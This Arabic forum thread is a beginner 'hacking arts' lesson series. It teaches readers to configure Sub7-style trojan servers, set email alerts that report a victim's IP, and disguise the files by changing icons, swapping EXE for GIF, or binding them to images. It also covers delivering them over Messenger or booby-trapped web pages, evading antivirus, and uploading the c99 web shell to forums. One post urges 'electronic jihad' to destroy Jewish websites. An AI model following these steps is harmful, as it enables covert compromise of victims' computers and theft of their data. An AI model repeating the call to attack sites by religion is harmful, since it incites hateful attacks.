Star Media

مرحبا بك عزيزي الزائر. بعض الأقسام و الروابط لا تضهر للزوار المرجوا منك أن تعرّف بنفسك و . إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و تصبح أحد أعضاء عائلتنا المتواضعة
<script type="text/javascript"><!--
document.write('<s'+'cript type="text/javascript" src="http://www.adallnetwork.com/sh.php?z=28&pl=1581&j=1&code='+new Date().getTime()+'"></s'+'cript>');
// --></script>
<noscript>
<iframe src="http://www.adallnetwork.com/sh.php?z=28&pl=1581" width="728" height="90" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</noscript>
<script type="text/javascript"><!--
zone = "38";
pl = "4150";
url = "http://www.adallnetwork.com";
//--></script>
<script type="text/javascript" src="http://www.adallnetwork.com/s.js"></script>

سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Star10


انضم إلى المنتدى ، فالأمر سريع وسهل

Star Media

مرحبا بك عزيزي الزائر. بعض الأقسام و الروابط لا تضهر للزوار المرجوا منك أن تعرّف بنفسك و . إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و تصبح أحد أعضاء عائلتنا المتواضعة
<script type="text/javascript"><!--
document.write('<s'+'cript type="text/javascript" src="http://www.adallnetwork.com/sh.php?z=28&pl=1581&j=1&code='+new Date().getTime()+'"></s'+'cript>');
// --></script>
<noscript>
<iframe src="http://www.adallnetwork.com/sh.php?z=28&pl=1581" width="728" height="90" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</noscript>
<script type="text/javascript"><!--
zone = "38";
pl = "4150";
url = "http://www.adallnetwork.com";
//--></script>
<script type="text/javascript" src="http://www.adallnetwork.com/s.js"></script>

سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Star10

Star Media

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

أقوى موقع يوفر البرامج النادرة


+2
DJONI
INES
6 مشترك

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    INES
    INES
    المسؤلة عن الموقع
    المسؤلة عن الموقع


    انثى
    عدد الرسائل : 158
    العمر : 35
    الجنسية : tunisienne
    السٌّمعَة : 0
    نقاط : 10795
    تاريخ التسجيل : 01/07/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف INES الأحد 3 أغسطس - 5:50

    السلام عليكم ورحمة الله وبركاته

    من هنا ان شاء الله سوف تكون البداية لتعليم الهاكر
    وذلك بسبب الكثير من الاخوه يودون تعلم الهاكر
    وارجوا متابعة الدروس والرد
    لحلقة الأولى من سلسلة حلقات تعليم فنون الهاكرز للمبتدئين (((((( من وماهو الهاكرز ؟ ))))))
    جميع هاذي المواضيع من كتاب سهروا الليالي لكتابتها ولتعليمك شيئا ..
    لاتكن سخيفا لدرجة نقل هذة المواضيع بأسمك !
    كما لاتستخدم ماتتعلمه ضد أخوانك المسلمين !
    أن كنت موافق على الشروط السابقة ...
    فلنبدأ بسم الله الرحمن الرحيم ..
    الموضوع : (منهم الهاكرز .. أخلاقياتهم ..أنواعهم .. أشهر برامجهم
    وأدواتهم التي يستخدمونها ..)
    _____________________
    _____________________
    1- مقدمة عن الهكرز:-
    الهكرز هم أشخاص أصلا مبرمجين محترفين طوراا قدراتهم وأصبحوا
    يستطيعون التسلل الي الأجهزة والمواقع وغيرهاا وأسمهم
    بالعربي مخترقون أو متسللون أما الانجليزي وهو الشائع الكتابة
    بنطقه بالعربي هو (************************************************* ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** ************************************************** *******************) .. للهاكرز تاريخ طويل ... ولأنني متأكدة
    أنه لافائدة من ذكر تاريخ الهاكرز لانه لن يفيدك بشيء !
    للهاكرز الكثير من التعاريف .. تختلف من أقليم لأقليم ومن هدف لهدف
    لذلك انا كتبت التعريف العام لهم ..
    ######################################
    ##2- أقسام الهكرز:-
    الهكرز ينقسمون الي قسمين (طبعاا هكرز الاجهزة)
    أ- المبتدىء : وهو أخطر أنواع المخترقين لأنه يريد تجربة كل ما تعلمه وغالبا ما
    يحب التدمير وتخريب الاجهزة لأنه يبدأ اولا بتعلم أختراق الأجهزة ..
    ب- الخبير: وهذا لاخوف منه لأنه يخترق الاجهزة فقط للبحث فيهاا
    ولأن هذا النوع يكون يتطلع لأكثر من ذلك الا وهو اختراق الشبكات والمواقع
    ######################################
    3- أشهر أدوات وبرامج هكرز الأجهزة :-
    كل برنامج يستخدمه هكرز الأجهزة ينقسم الى ثلاث أقسام وهي :
    أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية
    ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا
    أنصحك بفتحه
    ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس
    والذي سوف ترسله الي الضحية .. لكي يقوم بفتح المنفذ لك ومن ثم
    الدخول لجهاز ضحيتك ..
    ######################################
    كل ماسبق ذكره يختص بهكرز الأجهزة بشكل عام
    ######################################
    ماذا عن الهاكرز الآخرين ؟
    ######################################
    باللنسبة للهاكرز الاخرين هم : هاكرز المواقع والأنظمة والشبكات ..
    يجب علينا أن لا نقسمهم الى هذا التقسيم : اجهزة ومواقع ..
    لاكن انا قسمتها هنا لأنك كهاكر جديد اول ماتبدأ تعلمه
    طبعا هو أختراق الأجهزة ..
    لماااااذا أول ما أتعلمه أختراق الأجهزة ؟؟؟؟؟؟
    جواب : لأنها الأسهل في عالم الأختراق والهاكرز ( العالم السفلي للانترنت )
    سؤال : هل يجب علي أن أبدأ بتعلم أختراق الأجهزة أولا !!!
    جواب : من الأفضل لك عمل ذلك لكي تكون ملما بما حولك ..
    سؤال : هل هناك هاكرز عرب ؟؟
    جواب : نعم .. وبكل فخر .. لاكن للأسف بعضهم بل أكثرهم لازال يخترق الاجهزة
    بمعنى ان هذا الذي يضل طول حياته على أختراق الاجهزة بالبرامج
    المخصصة .. دون أن يطور نفسه وأدواته التي يستخدمها .. ودون ان يرتقي بنفسه
    الى أختراق المواقع والشبكات .. وأيضا الى عالم التشفير وفك الشفرات .
    ..والى عالم الحماية وأساليبها .. يعتبرجاهل .. ولا يعتبر هاكر ..
    بل يعتبر مغفل وطالب راسب في مدرستنا ..
    سؤال : كيف يمكنني ان أكون هاكر من أينأبدأ ؟؟
    سؤال : أريد أن اكون طالبا ناجحا ومتفوقا في مدرستكم .. كييف ؟؟
    جواب: أقرأ النصائح هذة أولا :
    1/ كهاكرمسلم يجب ان تكون لديك اخلاقيات دينك الحنيف ..
    2/ كهاكر مسلم لاتؤذي أخوانك المسلمين ..
    3/ كهاكر مسلم ساعد اخوانك ولاتغتر بما لديك من علم ..
    4/ التحق بالجهاد الالكتروني .. بمعنى حطم مواقع اليهود ..
    5/ يجب عليك تعلم لغات البرمجة الأساسية .. خصوصا لغات الأنترنت ..مثل
    جافا .. هتمل .. بي اتش بي .. الخ ..
    6/ تأكد ان اللغة الأنجليزية أحد أسس الدخول لهذا العلم ( علم الأختراق )
    7/ لاتترك جديدا الا وتعلمته ...
    ## والان هل تريد الدخول والبدء في عالم الاختراق ( التهكير ) ##
    أذا كان جوابك بنعم وكنت تريد التفوق في مدرسة العالم السفلي للانترنت ‍.
    فأقراء الحلقة الثانية من سلسلة حلقات :
    ( الكامل لتعليم فنون الهاكر للمبتدئين )
    علما ان الحلقة الثانية سوف تختص بأول شيء يجب ان
    تعرفه لدخول هذا العالم الا وهو ( أختراق الأجهزة )
    لاتخف سوف نبدأ من الصفر ..
    ######################################
    نهاية الحلقة الأولى .



    INES
    DJONI
    DJONI
    المدير العام على مجموعة مواقع STARMEDIA
    المدير العام على مجموعة مواقع STARMEDIA


    ذكر
    عدد الرسائل : 358
    العمر : 40
    الجنسية : Tunisien
    السٌّمعَة : 1
    نقاط : 18351
    تاريخ التسجيل : 22/06/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف DJONI الثلاثاء 14 أكتوبر - 17:38

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) 1020_011
    biotech
    biotech
    عضو جديد
    عضو جديد


    ذكر
    عدد الرسائل : 9
    العمر : 39
    الجنسية : algérienne
    السٌّمعَة : 0
    نقاط : 5710
    تاريخ التسجيل : 07/09/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف biotech الأربعاء 29 أكتوبر - 2:27

    ننتظر المزيد
    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Sans_t10
    DJONI
    DJONI
    المدير العام على مجموعة مواقع STARMEDIA
    المدير العام على مجموعة مواقع STARMEDIA


    ذكر
    عدد الرسائل : 358
    العمر : 40
    الجنسية : Tunisien
    السٌّمعَة : 1
    نقاط : 18351
    تاريخ التسجيل : 22/06/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف DJONI الأحد 16 نوفمبر - 16:51


    بسم الله الرحمن الرحيم
    الجزء الثانى من تعلم الهكر
    ************************************************** ****************************************
    ************************************************** ****************************************
    أختراق الأجهزة من الصفر للنهاية !!


    فلنبدأ بسم الله الرحمن الرحيم ..

    ----->>> أختراق الأجهزة وميكانيكيته ...

    اولا أعرف هذة الكلمات جيدا :

    العميل : هو الشخص المخترق لاكن من سوف يخدم العميل أو المخترق ؟
    الخادم : هو الملف التجسسي الذي سوف يخدم العميل أو المخترق ..

    تابع القرأة الان..

    ميكانيكية الاختراق ؟

    يعتمد الاختراق على ما يسمى بالريموت REMOTE اى السيطرة عن بعد
    ولكى تتم العمليه لابد من وجود شيئين هما :

    1/ برنامج عميل يساعدك على أتمام الأختراق والتحكم بجهاز الضحية
    2/ ملف خادم يمكن البرنامج العميل من الدخول للضحية بواسطة باب خلفي(منفذ)

    كيـــــــف يتم ذلك ؟

    تختلف برامج الاختراق فى المميزات وطريقه الاستخدام لكنها جميعا
    تعتمد على نفس الفكره التى ذكرناها وذلك بارسال ما نسميه الملف
    الاصق PATCH FILE او برنامج الخادم (server) أو التروجان
    والذي يرسله المخترق ( العميل )الى جهاز الضحيه فيقوم الضحيه بحسن نيه
    بتشغيل هذا الملف ظنا منه انها صوره او لقطه فيديو طريفه
    ولكنه يفاجأ !!!

    بعدم عمل هذا الملف بعد الظغط عليه فيظن انه ملف معطوب او صوره
    لم تكتمل بينما يكون المخترق قد وضع قدمه الاولى داخل جهاز الضحيه .

    الاتصـــــــال ؟

    يتم الاتصال بين الجهازين ( جهاز المخترق وجهاز الضحية )
    عبر منفذ اتصال عباره عن جزء من الذاكره
    له عنوان معين يتعرف عليه الجهاز بانها منطقه يتم ارسال
    واستقبال البيانات عليها ويمكن استخدام عددكبير من المنافذ وعددها يقارب
    من 65000منفذ تقريبا يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001
    يمكن اجراء اتصال عن طريقه

    وفى نفس اللحظه يتم استخدام المنفذ رقم 1002 لاجراء اتصال اخر .

    ماذا يحد ث عند ما يصاب الضحيه ببرنامج الخادم (server) ؟
    يتجه ملف الخادم عندما ترسله الى الضحيه الى ملف التسجيل لنظام
    الضحيه REGISTRY حيث ان النظام فى كل مره يقوم فيها الضحيه
    بتشغيل ويندوز يقوم بتشغيل البرامج المساعده ويقوم ملف
    الخادم بفتح منفذاتصال داخل جهاز الضحيه تمكن البرنامج الذي
    يستخدمه العميل (المخترق) من الدخول عليك بجهازك
    كما يقوم ملف الخادم بالتجسس على جهازالضحيه وذلك بتسجيل
    كل ما يحدث او عمل اشياء اخرى حسب ما يطلب منه .

    هذا يعنى ان الجهاز قد اصيب فعلا وبرنامج الخادم ينتظر طلب
    اتصال فى اى لحظه من البرنامج العميل عن طريق المنفذ الذى قام بفتحه .

    لاكن تأكد أن المخترق لكي يقوم بلأتصال بجهاز ضحيته يجب أن
    يتواجدلديه رقم كرقم الهاتف للضحية
    الا وهو الاي بي ip هذا الرقم يميز جهازك عن بقية الأجهزة على الشبكة
    مما يساعد في تبادل الحزم والملفات بصورة سلسلة وبدون مشاكل أو لخبطه
    سأوضح كيف يعمل هذا الرقم .. تابع القرأة :

    ## لاكن ماهو المنفذ وماهو الاي بي ##

    ## جواب ##
    المنفذ (Port):-
    وأتوقع أنه مفهوم من من نفس الكلمة فهو منفذ يصل بينك وبين
    الضحية لاكن تاكد أن بدون المنافذ لايمكن لك الأتصال بأي جهاز
    او حتى الأنصال بأنترنت لأن المنافذ عبارة عن بوابة تسهل دخول الحزم والبيانات ..
    من وألى الجهاز الآخر ..
    اليك أمثلة على المنافذ:-
    8080
    25
    26
    12
    6588
    80
    وغيرها

    الأي بي (IP) :-
    وهو أهم شيء في أختراق الاجهزة .. لماذا لأنه يعرف بجهازك ..
    بمعنى أن لجهازك هوية .. ماذا لو انك أردت أن تتصل بالجهاز "1"
    ولاكن أتصلت بالجهاز "2" .. هل رأيت هذا الاي بي ينظم الاجهزة على الشبكة
    ولا يتم الأختراق ألا به وتستطيع معرفة الأي بي الخاص بك من
    أ- أبدأ
    ب-تشغيل
    ج- أكتب الامر winipcfg
    ستفتح نافذة أمام الكلمة "عنوان IP " ستجد أرقام مكتوبة مكونة من
    أربع أجزاء هي الأي بي الخاص بك كل جزأ يدل على شيء فالجزء الاول يدل
    على مكان الأقامة والجزء الثاني أو الثالث يدل على مزود خدمة الانترنت
    ويجب أن تكون على الانترنت حتى يظهر الاي بي الخاص
    بك أما أذا لم تكن على الانترنت فسوف يظهر لك الرقم التالي 0.0.0.

    يتم الاتصال باحد الطريقتين ؟
    1-من قبل شخص يتعمد اختراق الجهاز المصاب بعينه وذلك لعلمه بوجود معلومات تهمه

    2-من قبل شخص لايتعمد اختراق الجهاز بعينه ولكنه يقوم بعمليه مسح SCANNING
    على مجموعه من الاجهزه فى نطاق معين من عناوين ip لمعرفه ايها الذي
    لديه منافذ مفتوحه أو أيها لديه ملف تجسس أو تروجان كما
    يحلو للبعض مناداته وبالتالىفهو قابل للاختراق
    وتوجد برامج مخصصه لعمل ذلك وبعض برامج الاختراق
    يوجد بها SCANNING .

    ###########

    سؤال : سمعت من الشرح السابق أن هناك برنامج خادم وتروجان وسيرفر
    هل جميعها تودي نفس الغرض ؟؟

    جواب : جميعها واحد .. لاكن تختلف التسميات .. واليك التسميات :

    SERVER : يسميه البعض سيرفر والبعض خادم << ليس كل الناس كبعضها ..
    TROGAN : يسميه البعض تروجان أو أحصنة طراودة ...
    PATCH : يسميه البعض باتش أو الملف الأصق ..

    جميع الذي سبق ذكره لها نفس العمل والفكره .
    وهي : تقوم بعمل منفذ خلفي في جهاز الضحية ليسهل لمرسلها ( المخترق )
    الدخول على جهاز ضحيته بواسطة البرامج
    المخصصة لأختراق الأجهزة مثل ( سب سيفن )

    ########### ###########

    سؤال : هل من برامج خاصة لأختراق الأجهزة ؟؟

    جواب : بالتأكيد ..

    وأشهرها : السب سيفن .. بل وأسهلها ..

    غير انه هنااك برامج أخرى قوية .. لاكنها صعبة قليلا على المبتدئين ..

    ########### ###########

    سؤال : كيف يمكنني معرفة أستخدامها ومن أين أحصل عليها ؟

    جواب : أولا عليك فهم الفكرة التالية :

    كل برنامج يستخدمه هكرز الأجهزة ينقسم الى ثلاث أقسام وهي :
    أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية
    ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا
    أنصحك بفتحه .. بل تقوم أنت بإرساله لضحيتك ..
    ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس
    والذي سوف ترسله الي الضحية .. لكي يقوم بفتح المنفذ لك ومن ثم
    الدخول لجهاز ضحيتك ..

    وبالنسبة لشرح السب سيفن وأيضاء الحصول عليه وعلى غيره من البرامج.

    تجدها في المنتدي ان شاء الله

    ###########

    سؤال : حصلت على برنامج أختراق أجهزة ..
    معه ملف أسمه سيرفر وملف آخر أسمه (Edit Server) ماذا علي أن أفعل الآن ؟؟

    جواب : حاول فتح الملف (Edit Server) ومن خلاله قم بصناعة السيرفر
    او الملف الخبيث الذي تريد ان ترسله للضحية .. كأن مثلا : تضع كلمة سر
    لكي يكون هذا الضحية ملكا لك ‍‍‍... أو ان تضع أبلاغ بريدي في كل مرة يدخل الضحية
    على النت .. او أن تضع أيقونة للملف السيرفر للتمويه على الضحية ..
    أو أو .. الخ ... وتختلف أعدادت كل سيرفر عن الاخر ..
    لاكن اعدادت سيرفر برنامج السب سيفن تعتبر الأكثر تحكما وتتوفر بها مميزات كثيره

    ثانيا : بعد تجهيزك لملفك الخبيث (Server) حاول أرساله للضحية من خلال

    الماسنجر .. مثلا ..

    تاكد عندما يفتح الضحية هذا الملف أن الملف الخبيث سوف يفتح منفذ خلفي لكي يسهل الدخول
    على جهاز الضحية ... لاكن ماهو المنفذ الذي سوف يفتحه لي البرنامج الخادم (Server)
    جواب : لكل برنامج أختراق منفذ خاص به مثلا : السب سيفن له المنفذ : 1243
    بعد فتح الضحية للملف الخبيث أو البرنامج الخادم (Server) سيفتح لك هذا المنفذ
    وكل ماعليك فعله هو التوجه للبرنامج الاصلي ( برنامج العميل ) او برنامج الأختراق
    وغالبا ماتجد ملفه بنفس أسم البرنامج .. ومن ثم الدخول على جهاز الضحية
    بعد كتابة رقم الاي بي الخاص بالضحية ورقم المنفذ الخاص برنامج الأختراق .
    كيف يمكنني الحصول على أي بي الضحية .. ؟؟
    جواب: الطرق كثيرة أسهلها من أعدادات الملف الخادم او التروجان الذي تستخدمه
    (Edit Server) قم بعمل تنبيه بريدي عندما يدخل الضحية للنت ..
    من هذا الخيار سوف يقوم ملفنا الخبيث بأرسال رقم الاي بي الذي دخل به
    الضحية على النت الى بريدك الذي وضعته في الأعدادات ...

    هذا يعني أن في كل مرة يدخل الضحية على النت يتغير رقم الاي بي حقه ؟

    جواب : نعم .. ولحل هذة المشكلة قم بعمل تنبيه بريدي في أعدادت السيرفر (Edit Server)
    كما أوضحت سابقا ..

    في نهاية الحلقة أتمنى أنك فهمت الفكرة التالية :

    كل برنامج يستخدمه هكرز الأجهزة ينقسم الى ثلاث أقسام وهي :
    أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية
    ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا
    أنصحك بفتحه .. بل تقوم أنت بإرساله لضحيتك ..
    ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس
    والذي سوف ترسله الي الضحية .. لكي يقوم بفتح المنفذ لك ومن ثم
    الدخول لجهاز ضحيتك ..

    ######################
    DJONI
    DJONI
    المدير العام على مجموعة مواقع STARMEDIA
    المدير العام على مجموعة مواقع STARMEDIA


    ذكر
    عدد الرسائل : 358
    العمر : 40
    الجنسية : Tunisien
    السٌّمعَة : 1
    نقاط : 18351
    تاريخ التسجيل : 22/06/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف DJONI الأحد 16 نوفمبر - 16:54

    الدرس الثالث

    كما عرفت في الحلقة السابقة اهمية الملف الخادم ( SERVER )

    لاكن تأكد اننا في العصر الحالي .. وجد بما يسمى الجدران النارية

    وأيضا وجد مايسمى برامج كشف الفيروسات .. وغيرها من البرامج ؟؟

    هذة البرامج تندرج تحت مايسمى : ( برامج الحماية الألكترونية )

    وللاسف أن حتى برنامج كشف الفيروسات أصبح يكشف ملفنا الخبيث ( SERVER )

    بمعنى : ان اذا كان لضحيتك أحد البرامج التي سبق ذكرها .. وانت تستخدم

    ملف سيرفر أو تروجان ( SERVER ) قديم ومعروووف ومكشووف من قبل برامج الحماية

    تاكد أنه لايمكنك الدخول على جهاز ضحيتك ... أبدا أبدا ...

    سؤال : ماذا علي أن أفعل أذن ؟؟؟؟

    جواب : اعتقد أن هناك فن يسمى ( فن أرسال وأخفاء السيرفر) ‍؟؟

    أتبع التالي لتكون ملما بهذا الفن : اولا ( أخفاء السيرفر)

    *البعض من الهاكرز يستخدم تروجونات وسيرفرات ( SERVER ) جديدة

    بحيث لايكشفها اي برنامج كشف عن الفيروسات ...

    *البعض من الهاكرز يستخدم برامج خاصة تقوم بتضليل السيرفر ( SERVER )

    عن برنامج الكشف عن الفيروسات .. ويمر مرور الكرام أمامها وبشكل مخفي..


    ثانيا : ( أرسال السيرفر )

    كما تعلم أن بعض الشركات الكبرى المقدمة لخدمة البريد الالكتروني

    مثل الهوتميل والياهو .. قامت بوضع برامج خاصة تفحص الرسائل المرسلة

    والمستقبلة من الفيروسات والملفات الخبيثه ( SERVER )


    يا ألهي .. كيف يمكنني أذا ارسال الملف ( SERVER ) ؟؟؟

    جواب : هل رأيت اهمية فن أرسال السيرفر ( SERVER )

    أتبع التالي :

    * بعض الهاكرز يقوم بأرسال السيرفر عبر الماسنجر ..

    لاكنه يقوم بتغيير ايقونة السيرفر .. أو حتى تغيير أمتداده من EXE مثلا الى GIF

    * بعض الهاكرز يقوم بعملية دمج الملف الخبيث ( SERVER ) مع ملف اخر ..

    بمعنى : ان الضحية لو فتح هذا الملف ظهرت له صورةاو فيلم معين .. لاكن
    ماهو داخل الصورة او الفيلم انه ( SERVER ) ملفنا الصغير والخبيث .

    * بعض الهاكرز يقوم بأستخدام برامج خاصة تقوم بعمل صفحات ملغومة على النت ..

    لاكن ماهي الصفحات الملغومة وكيف يممكنني عملها ؟؟؟

    جواب : هي صفحات هتمل عادية ( صفحة أنترنت ) يدخل اليها كود هتمل يودي هذا الكود هذا العمل :

    عندما يفتح الضحية الصفحة قم بزرع ملفنا الخبيث ( SERVER ) في جهاز الضحية

    ولعمل هذة الصفحات هناك برامج مخصصة لذلك وسهلة ايضا تعطيك الكود كاملا

    وماعليك فعله هو لصق هذا الكود في صفحة تحرير HTML لصفحتك << هل رأيت اهمية لغة البرمجة هذة في الاختراق ..


    كل التي سبق ذكرها هي طرق مختلفة لإرسال السيرفر ... ومن ثم أختراق الأجهزة ...

    \- لاكن ماذا لو يتم أختراق الأجهزة بدووون سيرفر او اي ملف اقوم بإرساله .. هل ممكن ذلك ؟؟!!؟؟

    جواب : هناك طرق لأختراق الأجهزة بدون ملفات خبيثة او حتى برامج مساعده لاكنها كلها تعتبر ركيكة ..

    على العموم سوف أذكر واحده فقط ... اليكم هذة الطريقة :

    الطريقة : هذة طريقة كتبها أحد الأخوان مشكورا ونسيت أسمه :

    شرح كيفيه الاختراق عن طريق الماسنجر
    شرح كيف تدخل جهاز صاحبك بالمسنجر!
    طبعا هو شرح لبرنامج النت ميتنج و ما يه من المواصفات اللي كثير كثير كثير كثير كثير منا يجهلها و هي ممكن تكون اكثر من مفيده

    مجملا! الكثير يعتقد ان النت ميتنج متخصص (وهو يأتي مع الويندوز) بس لأستخدام الكاميرا
    وهذا مو صحيح

    في برنامج النت ميتنج عن طريق دعوة ( Invite ) من المسنجر انك تتصل
    انت و صديقك بالمسنجر بالنت ميتنج
    و بعد تقدر انت تدخل كمبيوتر صديقك بعد اذنه انك تشاهد مذ يفعل و تشوف شاشته كأنها شاشتك
    و بعد اذنه هو تقدر تتحكم بكمبيوتره و تفعل الذي تريده

    كييييييييييييييييييييييف؟؟؟!!

    الان انت والشخص الذي معك تبغيه يرى شاشتك و يتحكم فيها اوكي؟

    سترى الان المسجر الجديد
    ( دعوه لأستخدام النت ميتنج )
    Start Netmeeting
    تضغط عليها بعدها هو بيوافق على دعوتك و بيفتج النت ميتنج مالك و ماله
    بعدها اذا عندك النت ميتنج الأنجليزي مثل هذا اختيار
    Tools
    Sharing
    بعدها بضهر مربع
    ( الذين عندهم العربية يختارون ادووات بعدها مشاركهة )
    بعدها تضغط على DeskTop اللي هو سطح المكتب
    بعدهال تضغط على Share (مشاركة)
    في هذي اللحظه صديقك يرى شاشتك وانت مذا تفعل
    اذا أردت أن يتحكم في جهازك
    في القسم السفلي مكتوب
    Control
    اضغط على
    Allow control
    يعني السماحه للشخص بالتحكم في كمبيوترك

    الان دور صديقك
    في الشاشه اللي يشوف منها كمبيوترك
    في الزاويه فوق يشوف كاتبين
    Request Control طلب التحكم
    بيجيك انت الطلب واضغط على
    موافق Accept
    فورا هو بيقدر يتحكم في كمبيوترك
    واذا أردت ان تاخذ منه التحكم
    يكفي ان تحرك فارتك لاي مكان او اضغط على اي زر في الكيبورد فورا تاخذ التحكم
    منه و ما لا قادر على التحكم الا اذا طلب التحكم مره ثانيه ..

    ######### طرق أخرى للأختراق من غير سيرفر #########

    هنالك طرق اخرى ولاكن تستخدم للأختراق من الأجهزة الداخلية في الشبكة المحلية
    كشبكات المدارس والجامعات وغيرها .. هذة تعتمد على مايسمى المشاركة في الملفات ..

    كما لا أنسى البرنامج WINPOPUP الذي يقوم بإرسال رسائل منبثقة داخل الشبكات المحلية بين

    الأجهزة هل تريد تشغيل هذا البرنامج أعمل الاتي :

    أذهب >> أبدا >> تشغيل >> أكتب الامر التالي : C:WINDOWSWINPOPUP.EXE

    ثم أضغط موافق ...

    البرنامج هذا جدا سهل ولا يحتاج اية شرووح ...


    هنالك طرق اخرى ايضا عن طريق التلنت ... << سوف أشرحها قريبا لوحدها ..


    ######### أخيرا ########

    أتمنى أنك أستفدت اخي الكريم من شرح فنون الهاكرز للمبتدئين .. حط مائة خط تحت كلمة مبتدئين ..

    يعني جميع هذة الدروووس نقطة من بحر علم الأختراااق ...

    على العموم هذة الدروس تضعك في أول الخط وعليك أكماله ..

    وتذكر " من يريد تسلق السلم عليه البدء من أسفله "

    أتمنى انك أستفدت وفقك الله لما فيه الخير ..

    نلتقي في الدرس القادم

    والسلام عليكم ورحمة الله وبركاته


    yesser
    yesser
    مشرف قسم الاصوتيات و المرئيات
    مشرف قسم الاصوتيات و المرئيات


    ذكر
    عدد الرسائل : 8
    العمر : 33
    الجنسية : tunis
    السٌّمعَة : 0
    نقاط : 6723
    تاريخ التسجيل : 25/08/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف yesser الخميس 20 نوفمبر - 20:35

    merci ya DJONI
    foued
    foued
    عضو جديد
    عضو جديد


    ذكر
    عدد الرسائل : 6
    العمر : 43
    الجنسية : tunisiene
    السٌّمعَة : 0
    نقاط : 5773
    تاريخ التسجيل : 06/07/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف foued الجمعة 21 نوفمبر - 16:46

    بارك الله فئك موظوع جدير بالمطالع مشكورت
    MOTASEM
    MOTASEM
    عضو بفريق عمل الموقع
    عضو بفريق عمل الموقع


    ذكر
    عدد الرسائل : 57
    العمر : 34
    الجنسية : فلسطيني
    السٌّمعَة : 1
    نقاط : 5776
    تاريخ التسجيل : 08/07/2008

    سلسلة دروس (تعليم فنون الهاكرز للمبتدئن ) Empty رد: سلسلة دروس (تعليم فنون الهاكرز للمبتدئن )

    مُساهمة من طرف MOTASEM الأربعاء 10 ديسمبر - 0:10

    الدرس الرابع

    إاختراق المنتديات

    قبل ما أبد ما سأقدمه لا ينطبق على مواقع الستار ميديا لأننا نوفر و الله الحمد سكرتي يستحيل كسرها من أي مخترق

    أبدء على بركة الله

    بسم الله الرجمن الرحيم

    طبعا كلنا نعرف شيل c99 الروسي القوي جدا وميزته
    تقدر تتعامل مع الملفات وان كان Safe-mode: ON (secure) يعني لو شغال
    هم تقدر تستعمله وتقدر تتنقل بحريه كأنك في لوحه تحكم

    طبعا في ثغرات كثيره تسمح برفع الشيل وهي ما تيسمى بـ كومند اكسسشن
    وكثيره متواجده بالمنتدى

    طبعا فرضا ان احنا رفعنا شيل على فكره معينا قلنا مثلا ثغله الابلود
    (( رفع الملفات )) وفتحنا الشيل ودخلنا بالشيل وكل شئ تمام كده

    بنشوف مجلدات الموقع وشفنا مجلد اسمه vb أو fourm يعني الموقع
    فيه منتدى

